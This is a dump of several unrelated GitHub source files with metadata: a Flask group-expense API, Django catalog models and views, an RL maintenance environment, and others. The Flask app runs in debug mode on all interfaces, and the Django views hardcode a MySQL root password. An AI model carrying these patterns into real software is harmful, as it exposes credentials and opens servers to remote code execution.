\"\"\"\n return model_utils.initialize_from_vit_train_states(self.config,\n train_state,\n restored_train_states,\n restored_model_cfgs,\n restored_model_formats)\n\n\nclass MTVMultiheadClassificationModel(\n vivit_model.ViViTMultiHeadClassificationModel, MTVClassificationModel):\n \"\"\"MTV model for multi-classification tasks.\n\n When methods are overriden by both parents, the implementation follows the\n first parent, which is ViViTMultiHeadClassificationModel in this case. For\n build_flax_model() and default_flax_model_config(), we explicitly call the\n methods from MTVClassificationModel.\n \"\"\"\n\n def build_flax_model(self) -> nn.Module:\n return MTVClassificationModel.build_flax_model(self)\n\n def default_flax_model_config(self) -> ml_collections.ConfigDict:\n return MTVClassificationModel.default_flax_model_config(self)\n","repo_name":"google-research/scenic","sub_path":"scenic/projects/mtv/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":31106,"program_lang":"python","lang":"en","doc_type":"code","stars":2619,"dataset":"github-code","pt":"37"}
+{"seq_id":"29972537806","text":"from pydantic.dataclasses import dataclass\n\nfrom src.application.users.dto import UserDTO\nfrom src.application.users.interfaces.repository_interface import (\n UserRepositoryInterface,\n)\nfrom src.application.users.interfaces.service_interface import (\n UserServiceInterface,\n)\nfrom src.domain.enums.error_message import ErrorMessage\nfrom src.domain.enums.status_code import StatusCode\nfrom src.domain.enums.success_message import SuccessMessage\n\n\n@dataclass\nclass UserService(UserServiceInterface):\n \"\"\"\n Service class for managing users.\n\n Attributes:\n storage (UserRepositoryInterface): The repository interface for user storage.\n success_message (SuccessMessage): Enum class containing success messages.\n error_message (ErrorMessage): Enum class containing error messages.\n \"\"\"\n\n storage: UserRepositoryInterface\n success_message = SuccessMessage\n error_message = ErrorMessage\n\n def create_user(self, user_dto: UserDTO):\n \"\"\"Create a new user.\n\n Args:\n user_dto (UserDTO): The user data transfer object.\n\n Returns:\n dictionary (dict): A dictionary with a success message.\n\n Raises:\n (Exception): A dictionary with an error message.\n\n \"\"\"\n user_entity = user_dto.to_domain()\n try:\n dto = user_dto.to_dto(user_entity)\n self.storage.create(dto)\n return {\n \"message\": self.success_message.CREATED_SUCCESSFULLY.value,\n \"code\": StatusCode.CREATED.value,\n }\n\n except Exception:\n return {\n \"message\": self.error_message.INVALID_REQUEST.value,\n \"code\": StatusCode.BAD_REQUEST.value,\n }\n","repo_name":"deivisonisidoro/clean_architeture_project","sub_path":"src/application/users/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"69861493228","text":"from models import Base, UserInfo, GroupInfo, GroupMapping, FriendMapping\nfrom flask import Flask, jsonify, request, abort, g\nfrom flask_httpauth import HTTPBasicAuth\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship, sessionmaker\nfrom SendVerification import verify\nfrom sqlalchemy import create_engine\nfrom flask_cors import CORS\n\nauth = HTTPBasicAuth()\n\nengine = create_engine('sqlite:///version1.db',connect_args={'check_same_thread': False})\n\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\napp = Flask(__name__) # Flask object created\nCORS(app) # CORS (Cross-Origin Resource Sharing) is a standard for accessing web resources on different domains.\n\n#to give access to authorized users\n@auth.verify_password\ndef verify_password(email_or_token, password):\n #Try to see if it's a token first\n email = UserInfo.verify_auth_token(email_or_token)\n if email:\n user = session.query(UserInfo).filter_by(email = email).one()\n else:\n user = session.query(UserInfo).filter_by(email = email_or_token).first()\n if not user or not user.verify_password(password):\n return False\n #session.close()\n g.user = user \n return True\n\n# Api for login that give the token\n@app.route('/api/login/', methods=[\"GET\"])\n@auth.login_required\ndef get_auth_token():\n token = g.user.generate_auth_token()\n return jsonify({'token': token.decode('ascii')})\n\n# Api for signup\n@app.route(\"/api/signup/\", methods=[\"POST\"])\ndef create_user():\n data = request.json[\"User\"]\n name = data[\"Name\"]\n email = data[\"Email\"]\n _password = data[\"Password\"]\n # new user created\n new_user = UserInfo(name, email)\n new_user.hash_password(_password)\n try:\n session.add(new_user)\n session.commit()\n #session.close()\n return jsonify(new_user.toJSON()), 201\n except:\n session.rollback()\n #session.close()\n return { \"Error\" : \"Internal Server Error\" }, 500\n \n# Api to create group by only authorized users\n@app.route(\"/api/create_group/\", methods=[\"POST\"])\n@auth.login_required\ndef create_group():\n data = request.json[\"Group\"]\n name = data[\"Name\"]\n owner = g.user.email\n new_group = GroupInfo(name, owner)\n try:\n session.add(new_group)\n session.commit()\n user = session.query(UserInfo).filter_by(email = owner).first()\n user_id = user.id\n group = session.query(GroupInfo).all()\n if group == None:\n group_id = 1\n else:\n group.reverse()\n group_id = group[0].id\n # add mapping of user with its group\n new_mapping = GroupMapping(user_id, group_id)\n session.add(new_mapping)\n session.commit()\n #session.close()\n return jsonify(new_group.toJSON()), 201\n except:\n session.rollback()\n #session.close()\n return { \"Error\" : \"Internal Server Error\" }, 500\n\n# Api to add user in existing group\n@app.route(\"/api/add_user_to_group/\", methods=[\"POST\"])\n@auth.login_required\ndef add_user_to_group():\n data = request.json[\"Group\"]\n name = data[\"Group_Name\"]\n email = data[\"New_Person_Email\"]\n try:\n # retrive user_id\n user = session.query(UserInfo).filter_by(email = email).first()\n user_id = user.id\n # retrive group_id\n group = session.query(GroupInfo).filter_by(name = name).first()\n group_id = group.id\n new_mapping = GroupMapping(user_id, group_id)\n session.add(new_mapping)\n session.commit()\n #session.close()\n return jsonify(new_mapping.toJSON()), 201\n except:\n session.rollback()\n #session.close()\n return { \"Error\" : \"Internal Server 
Error\" }, 500\n\n# Api to add friend in existing user\n@app.route(\"/api/add_friend/\", methods=[\"POST\"])\n@auth.login_required\ndef add_friend():\n data = request.json[\"Friend_Details\"]\n email = data[\"Friend_Email\"]\n owner = g.user.email\n try:\n # retrive user_id\n user = session.query(UserInfo).filter_by(email = email).first()\n friend_id = user.id\n # retrive group_id\n user = session.query(UserInfo).filter_by(email = owner).first()\n user_id = user.id\n # one side mapping\n new_friend = FriendMapping(user_id, friend_id)\n session.add(new_friend)\n session.commit()\n #other side mapping\n user_id, friend_id = friend_id, user_id\n new_friend = FriendMapping(user_id, friend_id)\n session.add(new_friend)\n session.commit()\n #session.close()\n return jsonify(new_friend.toJSON()), 201\n except:\n session.rollback()\n #session.close()\n return { \"Error\" : \"Internal Server Error\" }, 500\n\n#Api for current user detail\n@app.route(\"/api/details/\", methods=[\"GET\"])\n@auth.login_required\ndef user_detail():\n user_email = g.user.email\n try:\n user = session.query(UserInfo).filter_by(email = user_email).first()\n email = user.email\n name = user.name\n status = user.status\n member_since = user.created_on\n #session.close()\n return { \"User Details\" : {\n \"Email\" : email,\n \"Name\" : name,\n \"Member Since\" : member_since,\n \"Stauts\" : status\n }\n }, 200\n except:\n session.rollback()\n #session.close()\n return { \"Error\" : \"Internal Server Error\" }, 500\n\n# Api to retrive all friends of current user\n@app.route(\"/api/all_friends/\", methods=[\"GET\"])\n@auth.login_required\ndef retrive_friends():\n user_email = g.user.email\n try:\n user_detail = session.query(UserInfo).filter_by(email = user_email).first()\n user_id = user_detail.id\n all_friends = session.query(FriendMapping).filter_by(user_id = user_id).all()\n friends_ids = []\n for i in all_friends:\n friend_id = i.friend_id\n print(friend_id)\n friends_ids.append(friend_id)\n friend_name = []\n for i in friends_ids:\n cur_friend_name = session.query(UserInfo).filter_by(id = i).first().name\n friend_name.append(cur_friend_name)\n #session.close()\n return {\"All_Friend_Name\" : friend_name }, 200\n except:\n session.rollback()\n #session.close()\n return { \"Error\" : \"Internal Server Error\" }, 500\n\n# Api to retrive all active groups of current user\n@app.route(\"/api/active_group/\", methods=[\"GET\"])\n@auth.login_required\ndef retrive_active_groups():\n user_email = g.user.email\n try:\n user_detail = session.query(UserInfo).filter_by(email = user_email).first()\n user_id = user_detail.id\n all_groups = session.query(GroupMapping).filter_by(user_id = user_id).all()\n group_ids = []\n for i in all_groups:\n group_id = i.group_id\n group_ids.append(group_id)\n info = []\n cnt = 1\n for i in group_ids:\n cur_group = session.query(GroupInfo).filter_by(id = i, status = \"Active\").first()\n cur_group_info = {}\n name = cur_group.name\n id = cur_group.id\n cur_group_info[\"Name\"] = name\n cur_group_info[\"Id\"] = id\n info.append(cur_group_info)\n cnt += 1\n #session.close()\n return {\"Active Groups\" : info }, 200 \n except:\n session.rollback()\n #session.close()\n return { \"Error\" : \"Internal Server Error\" }, 500\n\n# Api to retrive all deactive groups of current user\n@app.route(\"/api/deactive_group/\", methods=[\"GET\"])\n@auth.login_required\ndef retrive_deactive_groups():\n user_email = g.user.email\n try:\n user_detail = session.query(UserInfo).filter_by(email = user_email).first()\n user_id 
\n# API to retrieve all active groups of the current user\n@app.route(\"/api/active_group/\", methods=[\"GET\"])\n@auth.login_required\ndef retrive_active_groups():\n user_email = g.user.email\n try:\n user_detail = session.query(UserInfo).filter_by(email = user_email).first()\n user_id = user_detail.id\n all_groups = session.query(GroupMapping).filter_by(user_id = user_id).all()\n group_ids = []\n for i in all_groups:\n group_id = i.group_id\n group_ids.append(group_id)\n info = []\n for i in group_ids:\n cur_group = session.query(GroupInfo).filter_by(id = i, status = \"Active\").first()\n if cur_group is None: # skip groups whose status does not match\n continue\n cur_group_info = {}\n name = cur_group.name\n id = cur_group.id\n cur_group_info[\"Name\"] = name\n cur_group_info[\"Id\"] = id\n info.append(cur_group_info)\n #session.close()\n return {\"Active Groups\" : info }, 200\n except:\n session.rollback()\n #session.close()\n return { \"Error\" : \"Internal Server Error\" }, 500\n\n# API to retrieve all deactive groups of the current user\n@app.route(\"/api/deactive_group/\", methods=[\"GET\"])\n@auth.login_required\ndef retrive_deactive_groups():\n user_email = g.user.email\n try:\n user_detail = session.query(UserInfo).filter_by(email = user_email).first()\n user_id = user_detail.id\n all_groups = session.query(GroupMapping).filter_by(user_id = user_id).all()\n group_ids = []\n for i in all_groups:\n group_id = i.group_id\n group_ids.append(group_id)\n info = []\n for i in group_ids:\n cur_group = session.query(GroupInfo).filter_by(id = i, status = \"Deactive\").first()\n if cur_group is None: # skip groups whose status does not match\n continue\n cur_group_info = {}\n name = cur_group.name\n id = cur_group.id\n cur_group_info[\"Name\"] = name\n cur_group_info[\"Id\"] = id\n info.append(cur_group_info)\n #session.close()\n return {\"Deactive Groups\" : info }, 200\n except:\n session.rollback()\n #session.close()\n return { \"Error\" : \"Internal Server Error\" }, 500\n\n# API to retrieve the details of a group\n@app.route(\"/api/group_details/\", methods=[\"GET\"])\n@auth.login_required\ndef retrive_group_details():\n data = request.json[\"Group\"]\n id = data[\"Id\"]\n try:\n Group = session.query(GroupInfo).filter_by(id = id).first()\n group_name = Group.name\n owner = Group.owner\n status = Group.status\n created_on = Group.created_on\n created_by = session.query(UserInfo).filter_by(email=owner).first().name\n members = session.query(GroupMapping).filter_by(group_id=id).all()\n member_ids = []\n for i in members:\n member_ids.append(i.user_id)\n member_names = []\n for i in member_ids:\n name = session.query(UserInfo).filter_by(id = i).first().name\n member_names.append(name)\n #session.close()\n return {\n \"Group Details\" :\n {\n \"Status\" : status,\n \"Name\" : group_name,\n \"Created By\" : created_by,\n \"Created On\" : created_on,\n \"Members Name\" : member_names\n }\n }, 200\n except:\n session.rollback()\n #session.close()\n return { \"Error\" : \"Internal Server Error\" }, 500\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='0.0.0.0')\n","repo_name":"akashvermaofskt/group-expense-manager","sub_path":"backend/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":10072,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"5356560155","text":"import numpy as np\nimport reliability as rlb\nfrom typing import List\nfrom Environment.Technician import Technician\n\n\nclass Machine:\n def __init__(self, idx, failure_dist):\n self.id = idx\n self.state = 0\n self.failure_dist = []\n self.num_failures = len(failure_dist)\n self.life_components = np.array([0] * self.num_failures)\n self.failure_time = np.array([0] * self.num_failures)\n self.state_components = np.array([0] * len(failure_dist))\n self.remaining_maintenance = 0\n self.component_maintenance = -1\n self.tech_assigned = -1\n self.maintenance_action = -1\n self.reward = [1, -1, 0]\n self.assignment_success = 0\n self.text_state = [\" working \", \" breakdown \", \"maintenance\"]\n self.colors_state = [(102, 255, 0, 75), (180, 0, 0, 75), (255, 210, 0, 75)]\n self.img_position = (0, 0)\n self.history = []\n np.random.seed(0)\n for i, (alpha, beta) in enumerate(failure_dist):\n self.failure_dist.append(rlb.Distributions.Weibull_Distribution(alpha=alpha, beta=beta))\n self.failure_time[i] = int(np.ceil(self.failure_dist[-1].random_samples(1) + np.finfo(float).eps))\n\n def step(self, tech: List[Technician]):\n if self.state == 0:\n self.life_components += 1\n any_fail = np.argwhere(self.failure_time - self.life_components <= 0).T.tolist()[0]\n self.state_components[any_fail] = 1 # Breakdown\n if len(any_fail) > 0:\n self.state = 1\n self.history.append(-2)\n elif self.state == 1: # Breakdown\n self.history.append(-1)\n pass\n elif self.state == 2: # Maintenance\n self.remaining_maintenance -= 1\n self.history.append(self.tech_assigned)\n if self.remaining_maintenance <= 0:\n #print(self.maintenance_action)\n self.failure_time[self.component_maintenance] = int(\n np.ceil(self.failure_dist[self.component_maintenance].random_samples(1) + np.finfo(float).eps))\n self.life_components[self.component_maintenance] = 0\n self.component_maintenance = -1\n self.maintenance_action = -1\n # Reset technician parameters\n tech[self.tech_assigned].set_state_machine(True, -1)\n self.tech_assigned = -1\n # Check if there is more failures to be fix\n self.state_components *= 0\n any_fail = np.argwhere(self.failure_time - self.life_components <= 0).T.tolist()[0]\n self.state_components[any_fail] = 1 # Breakdown\n self.state = 1 if len(any_fail) > 0 else 0\n return self.state\n\n def assign_tech(self, tech: List[Technician], idx_tech: int, action: int):\n self.maintenance_action = action\n self.assignment_success = True\n if action >= 0:\n if self.state <= 1 and tech[idx_tech].state:\n self.state = 2\n self.tech_assigned = idx_tech\n self.remaining_maintenance = tech[idx_tech].mt2r[action]\n self.component_maintenance = action\n tech[idx_tech].set_state_machine(False, self.id)\n self.assignment_success = True\n else:\n self.assignment_success = False\n return self.assignment_success\n\n def reset(self):\n self.state = 0\n self.life_components = np.array([0] * len(self.failure_dist))\n self.state_components = np.array([0] * len(self.failure_dist))\n self.remaining_maintenance = 0\n self.tech_assigned = -1\n self.maintenance_action = -1\n self.component_maintenance = -1\n self.failure_time = np.array([0] * self.num_failures)\n self.assignment_success = True\n self.history = []\n for i, d in enumerate(self.failure_dist):\n self.failure_time[i] = int(np.ceil(self.failure_dist[i].random_samples(1) + 
np.finfo(float).eps))\n","repo_name":"marceloruizrodriguez/RL_Lecture","sub_path":"Environment/Machine.py","file_name":"Machine.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"30373188942","text":"from tools.parsers import basecorpus\nimport pandas as pd\nimport numpy as np\n\n# this class reads list of negation words and transforms them into a proper CSV with their upper case representation\nclass Negation(basecorpus.BaseCorpus):\n # constructor\n def __init__(self):\n basecorpus.BaseCorpus.__init__(self)\n self.defaultFileNameOrig = '.'+self.sepDir+'corpora'+self.sepDir+'negations'+self.sepDir+'negations.txt'\n self.defaultFileNameProcessed = '.'+self.sepDir+'corpora'+self.sepDir+'processed'+self.sepDir+'negation.csv'\n self.columns = ['phrase', 'phraseUpper']\n\n\n # reads the file and returns pandas DataFrame\n def readFileRaw(self, rawFileName ):\n if rawFileName == None:\n rawFileName = self.defaultFileNameOrig\n skippedFirstLine = False\n\n with open(rawFileName, 'r') as rawfile:\n data = pd.read_csv(rawfile, sep=\"\\t\", skipinitialspace = True).rename(columns=str.lower)\n processedData = pd.DataFrame(np.zeros((data.shape[0], 2)), columns = self.columns)\n processedData['phrase'] = data\n processedData['phraseUpper'] = processedData['phrase'].map(lambda cell: cell.upper())\n return processedData\n return None # just safety measurement","repo_name":"polakluk/supreme-court-analysis","sub_path":"tools/parsers/corpora_sentiment/negation.py","file_name":"negation.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"36045527374","text":"from django.db import models\nfrom django.utils.html import format_html\nfrom django.utils.translation import gettext as _\nimport xlrd\nfrom .utils import get_century\n\n# Create your models here.\n\"\"\" \nModèle de l'app: Publication Author Dewey \n\n\"\"\"\n\n\nclass Author(models.Model):\n first_name = models.CharField(\n max_length=30, null=True, blank=True, verbose_name=_(\"Prénom\"),)\n last_name = models.CharField(max_length=30, verbose_name=_(\"Nom\"),)\n name = models.CharField(max_length=61, editable=False)\n century_birth = models.IntegerField(\n null=True, blank=True, editable=False, verbose_name=_(\"Siècle\"),)\n date_birth = models.DateField(\n null=True, blank=True, verbose_name=_(\"Date de naissance\"),)\n place_birth = models.CharField(\n max_length=50, null=True, blank=True, verbose_name=_(\"Lieu de naissance\"),)\n\n date_died = models.DateField(\n null=True, blank=True, verbose_name=_(\"Date de décès\"),)\n place_died = models.CharField(\n max_length=30, null=True, blank=True, verbose_name=_(\"Lieu de décès\"),)\n content = models.TextField(\n null=True, blank=True, verbose_name=_(\"Contenu\"),)\n image_url = models.URLField(\n null=True, blank=True, verbose_name=_(\"URL d'image\"),)\n image_file = models.ImageField(\n null=True, blank=True, verbose_name=_(\"Chemin du fichier image\"),)\n\n class Meta:\n ordering = [\"last_name\"]\n verbose_name = _(\"Auteur\")\n\n def __str__(self):\n if self.first_name:\n return f\"{self.last_name}, {self.first_name} \"\n else:\n return self.last_name\n\n def clean(self):\n \"\"\"\n update of century from using catalog.utils.get_century function\n update name in or \n \"\"\"\n\n if self.date_birth:\n # century\n self.century_birth = get_century(self.date_birth.year)\n return self.century_birth\n if self.first_name:\n return f\"{self.last_name}, {self.first_name} \"\n else:\n self.name = self.last_name\n\n\nclass Dewey(models.Model):\n\n ''' attention liste ordonnée'''\n\n BG_COLOR_CHOICES = [\n (\"000\", \"#000000\", \"#FFFFFF\", \"black\"), # Black 000\n (\"100\", \"#8B4513\", \"#FFFFFF\", \"maroon\"), # Maroon 100\n (\"200\", \"#FF0000\", \"#FFFFFF\", \"red\"), # Red 200\n (\"300\", \"#FF4500\", \"#000000\", \"orange\"), # Orange 300\n (\"400\", \"#FFFF00\", \"#000000\", \"yellow\"), # Yellow 400\n (\"500\", \"#32CD32\", \"#000000\", \"green\"), # Green 500\n (\"600\", \"#1E90FF\", \"#000000\", \"blue\"), # Blue 600\n (\"700\", \"#8B008B\", \"#FFFFFF\", \"purple\"), # Purple 700\n (\"800\", \"#A9A9A9\", \"#FFFFFF\", \"grey\"), # Grey 800\n (\"900\", \"#FFFFFF\", \"#000000\", \"white\"), # White 900\n\n ]\n\n TEXT_COLOR_CHOICES = [\n (\"#000000\", \"black\"),\n (\"#FFFFFF\", \"white\"),\n ]\n\n name = models.CharField(max_length=120, verbose_name=_(\"Catégorie\"),)\n number = models.CharField(\n max_length=12, default='000', verbose_name=_(\"Numéro Dewey\"),)\n bg_color = models.CharField(max_length=7,\n null=True, blank=True, editable=False)\n text_color = models.CharField(\n max_length=7, null=True, blank=True, editable=False, default='#000000')\n\n class Meta:\n ordering = [\"number\"]\n\n def __str__(self):\n return f\"{self.number} - {self.name}\"\n\n # def xls_reader(self):\n # ''' permet de lire un fichier xls du répertoire /scrap/ grace à l'import xlrd\n\n # '''\n # path = \"scrap/La_Dewey_simplifiee.xls\"\n # number = []\n # # ouverture du classeur\n # classeur = xlrd.open_workbook(path)\n\n # # Récupération du nom de toutes les feuilles sous forme de liste\n # nom_des_feuilles = 
classeur.sheet_names()\n\n # # Récupération de la première feuille\n # feuille = classeur.sheet_by_name(nom_des_feuilles[0])\n # for i in range(0, 109):\n # # for j in range(0, 1):\n # # print(u\"Lecture des cellules:\")\n # # print(\"A1: {}\".format(feuille.cell_value(i, j)))\n # if feuille.cell_value(i, 1):\n # item = Dewey(number=feuille.cell_value(i, 1),\n # name=feuille.cell_value(i, 2))\n # item.save()\n # print(\"Number: {}\".format(feuille.cell_value(i, 1)))\n # # elif !(feuille.cell_value(i, 1)) and feuille.cell_value(i, 2):\n # # self.name = feuille.cell_value(i, 2)\n\n def clean(self):\n # self.xls_reader()\n str_number = str(int(self.number))\n if len(str_number) < 3:\n str_number = str(int(self.number))\n if len(str_number) < 2:\n str_number = '00' + str_number\n else:\n str_number = '0' + str_number\n self.number = str_number\n\n # def set_dewey_color_publication(self):\n # return format_html(\n # '{}',\n # self.bg_color,\n # self.text_color,\n # self.name,\n # )\n\n def set_dewey_color_publication(self):\n if self.number:\n try:\n i = int(self.number[:1])\n return format_html(\n '{}',\n self.BG_COLOR_CHOICES[i][1],\n self.BG_COLOR_CHOICES[i][2],\n self.number,\n )\n except:\n return \"Wrong Format\"\n\n # def set_dewey_color_publication(self):\n # for i in range(0, len(self.BG_COLOR_CHOICES)):\n # if self.number[:1] == str(i):\n # self.bg_color = self.BG_COLOR_CHOICES[i][0]\n # self.text_color = self.BG_COLOR_CHOICES[i][1]\n # return format_html(\n # '{}',\n # self.bg_color,\n # self.text_color,\n # self.name,\n # )\n\n # def set_dewey_color_publication(self):\n # if self.number[:1] == '0':\n # self.bg_color = self.BG_COLOR_CHOICES[0][0]\n # self.text_color = self.TEXT_COLOR_CHOICES[1][0]\n # elif self.number[:1] == '1':\n # self.bg_color = self.BG_COLOR_CHOICES[1][0]\n # elif self.number[:1] == '2':\n # self.bg_color = self.BG_COLOR_CHOICES[2][0]\n # elif self.number[:1] == '3':\n # self.bg_color = self.BG_COLOR_CHOICES[3][0]\n # elif self.number[:1] == '4':\n # self.bg_color = self.BG_COLOR_CHOICES[4][0]\n # elif self.number[:1] == '5':\n # self.bg_color = self.BG_COLOR_CHOICES[5][0]\n # elif self.number[:1] == '6':\n # self.bg_color = self.BG_COLOR_CHOICES[6][0]\n # elif self.number[:1] == '7':\n # self.bg_color = self.BG_COLOR_CHOICES[7][0]\n # self.text_color = self.TEXT_COLOR_CHOICES[1][0]\n # elif self.number[:1] == '8':\n # self.bg_color = self.BG_COLOR_CHOICES[8][0]\n # self.text_color = self.TEXT_COLOR_CHOICES[1][0]\n # elif self.number[:1] == '9':\n # self.bg_color = self.BG_COLOR_CHOICES[9][0]\n # self.text_color = self.TEXT_COLOR_CHOICES[0][0]\n # return format_html(\n # '{}',\n # self.bg_color,\n # self.text_color,\n # self.name,\n # )\n\n\nclass Publication(models.Model):\n\n TYPEPUBLICATION_CHOICES = [\n (\"B\", \"Books\"),\n (\"M\", \"Music\"),\n (\"F\", \"Film\"),\n (\"_\", \"Autre\")\n ]\n isbn = models.CharField(max_length=14, null=True,\n blank=True, verbose_name=_(\"ISBN\"),)\n name = models.CharField(max_length=120, verbose_name=_(\"Nom de l'oeuvre\"),)\n type_publication = models.CharField(\n max_length=1, choices=TYPEPUBLICATION_CHOICES, default='B', verbose_name=_(\"type de parution\"),)\n genre = models.CharField(max_length=35, null=True, blank=True)\n author = models.ForeignKey(\n Author, models.PROTECT, verbose_name=_(\"Auteur\"),)\n reference = models.CharField(\n max_length=61, null=True, blank=True, editable=False, verbose_name=_(\"Référence interne\"),)\n dewey_number = models.ForeignKey(\n Dewey, models.PROTECT, verbose_name=_(\"Numero 
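\n# Publication.reference is rebuilt in clean() from the Dewey number, the\n# first three letters of the author's last name (upper-cased), and the\n# primary key.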
Dewey\"),)\n date_publication = models.DateField(\n null=True, blank=True, verbose_name=_(\"Date de publication\"),)\n nb_tracks_pages = models.IntegerField(\n null=True, blank=True, verbose_name=_(\"Pages/Pistes\"),)\n label_editor = models.CharField(\n max_length=50, null=True, blank=True, verbose_name=_(\"Label/Editeur\"),)\n content = models.TextField(\n null=True, blank=True, verbose_name=_(\"Contenu\"),)\n image_url = models.URLField(\n null=True, blank=True, verbose_name=_(\"URL de l'image\"),)\n image_file = models.ImageField(\n null=True, blank=True, verbose_name=_(\"Chemin du fichier\"),)\n\n # permet d'ordonner l'affichage\n\n class Meta:\n ordering = [\"reference\"]\n\n # permet d'afficher une valeur dans la page home de publication à la place de 'object'\n\n def __str__(self):\n return f\"{self.reference} {self.name} {self.author}\"\n\n def clean(self):\n if self.dewey_number and self.author:\n self.reference = f\"{self.dewey_number.number}.{self.author.last_name[:3].upper()}.{self.pk}\"\n else:\n self.reference = \"\"\n","repo_name":"thycan22/babel-thycan22","sub_path":"catalog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"32710804387","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, render_to_response\n\n# Create your views here.\nimport datetime, MySQLdb\n\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\n\nfrom django.contrib import auth\nfrom django.db.models import Q\nfrom django.shortcuts import render_to_response\nfrom .models import book , publisher\nfrom django.core.mail import send_mail\nfrom .forms import contactform ,pubform\nfrom django.template import RequestContext, Template, TemplateDoesNotExist\nfrom django.core.mail import send_mail, EmailMessage\nimport csv\nfrom reportlab.pdfgen import canvas\nfrom io import StringIO\nfrom django.views.decorators.cache import cache_page\nfrom django.urls import reverse\nfrom django.utils.translation import gettext\nfrom django.utils import translation\nfrom django.conf import settings\n\npassengers = [125,65,875, 873, 986, 54, 653, 123, 434]\n\ndef hoi(request):\n\t# txt = \"\"\"
welcoming you
\"\"\"\n\t #return HttpResponse(txt)\n\ttimenow = datetime.datetime.now()\n\tdays = ['m', 't','w', 'th', 'f', 's', 'su']\n\treturn render(request, \"h2.html\", {\"time\": timenow, \"daysweek\": days})\n\n\n\ndef article(req, id):\n\t txt = \"displaying article number : %s\" %id\n\t return HttpResponse(txt) \n\n\n\ndef dbom(request):\n\t db = MySQLdb.connect(user='root', db= 'djangodb', passwd='giessen', host='localhost')\n\t cursor = db.cursor()\n\t cursor.execute('select name from names' )\n\t names = [row[0] for row in cursor.fetchall()]\n\t db.close()\n\t return render_to_response('books.html', {'namesintemplate': names})\n\n\ndef search (request):\n\tquery = request.GET.get('q', '')\n\tprinted = query\n\tif query:\n\t\tqset = (Q(title__icontains=query) | Q(authors__firstname__icontains=query) |\n\t\t\t\tQ(authors__lastname__icontains=query) | Q(authors__email__icontains=query)\n \n\n\t\t\t)\n\n\t\tresults = book.objects.filter(qset).distinct()\n\n\telse:\n\t\tresults = []\n\n\treturn render_to_response(\"search.html\" , {\n\t\t \"r\": results, \"q\":query, \"printed\":printed,\n\n\n\n\t\t}) \n\ndef index(request):\n\t\treturn render_to_response(\"index.html\")\n\n\ndef contact(request):\n\tif request.method == 'POST':\n\t\tform = contactform(request.POST, initial={'sender':'use@example.com'})\n\t\tif form.is_valid():\n\t\t\ttopic = form.cleaned_data['topico']\n\t\t\tmessage = form.cleaned_data['message']\n\t\t\t\n\t\t\tsender = form.cleaned_data.get('sender', 'noreply@example.com')\n\t\t\tsend_mail('feedback from site, topic: %s' % topic, message, '', ['med.abuali@gmail.com'], fail_silently=False,)\n\t\t\treturn HttpResponseRedirect('index')\n\t\t\t#return HttpResponseRedirect(reverse('sendmail'))\n\n\telse:\n\t\tform = contactform(initial={'sender':'u@example.com'})\n\t\n\treturn render(request, 'contact.html', {'form':form})\n\n\ndef publish(request):\n\tif request.method == 'POST':\n\t\tform = pubform(request.POST)\n\t\tif form.is_valid():\n\t\t\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect(\".\")\n\n\telse : \n\t\tform = pubform()\n\n\treturn render(request, 'add_publish.html', {'form': form})\n\t\ndef send(request):\n\tmsg = EmailMessage('req callback', 'here is the msg',to=['med.abuali@gmail.com'])\n\tmsg.send()\n\n\t#return HttpResponseRedirect('contact/')\n\t#return HttpResponseRedirect(reverse('sendmail'))\n\treturn render_to_response(\"search.html\")\n \n\ndef viewing(request, tmpname):\n\treturn render_to_response(tmpname)\n\n\n\ndef mailing(request):\n\tmsg= EmailMessage('subject ', 'mesj from inside mail def', to=['meddhif@gmail.com'])\n\n\n\tmsg.send()\n\n\treturn render_to_response('success.html')\n\ndef whatever(request):\n\ttry:\n\t\treturn render_to_response('djk.html')\n\t\t\n\texcept TemplateDoesNotExist:\n\t\traise Http404()\n\t\t\n\n\ndef csv(request):\n\t# img = open(\"/home/mad/Pictures/cpm.pdf\", \"rb\").read()\n\t# return HttpResponse(img, content_type=\"application/pdf\")\n\tresp = HttpResponse(content_type='text/csv')\n\tresp['Content-Disposition']= 'attachment; filename=ruly.csv'\n\n\n\twriter = csv.writer(resp)\n\tfor (year, num) in zip(range(1995,2006), passengers):\n\t\twriter.writerow([year,num])\n\n\treturn resp\n\n\n\ndef pdf(request):\n\n\tresp = HttpResponse(content_type='application/pdf')\n\tresp['Content-Disposition'] = 'attachment; filename=mypdf.pdf'\n\n\n\tp = canvas.Canvas(resp)\n\n\tp.drawString(10,10, \"hi there A company needs to develop a strategy for software product development for which it has a choice of two programming 
\n\ndef export_csv(request):\n\t# img = open(\"/home/mad/Pictures/cpm.pdf\", \"rb\").read()\n\t# return HttpResponse(img, content_type=\"application/pdf\")\n\tresp = HttpResponse(content_type='text/csv')\n\tresp['Content-Disposition'] = 'attachment; filename=ruly.csv'\n\n\twriter = csv.writer(resp)\n\tfor (year, num) in zip(range(1995, 2006), passengers):\n\t\twriter.writerow([year, num])\n\n\treturn resp\n\n\ndef pdf(request):\n\tresp = HttpResponse(content_type='application/pdf')\n\tresp['Content-Disposition'] = 'attachment; filename=mypdf.pdf'\n\n\tp = canvas.Canvas(resp)\n\tp.drawString(10, 10, \"hi there A company needs to develop a strategy for software product development for which it has a choice of two programming languages L1 and L2. The number of lines of code (LOC) developed using L2 is estimated to be twice the LOC developed with L1. The product will have to be maintained for five years. Various parameters for the company are given in the table below.\")\n\tp.showPage()\n\tp.save()\n\n\treturn 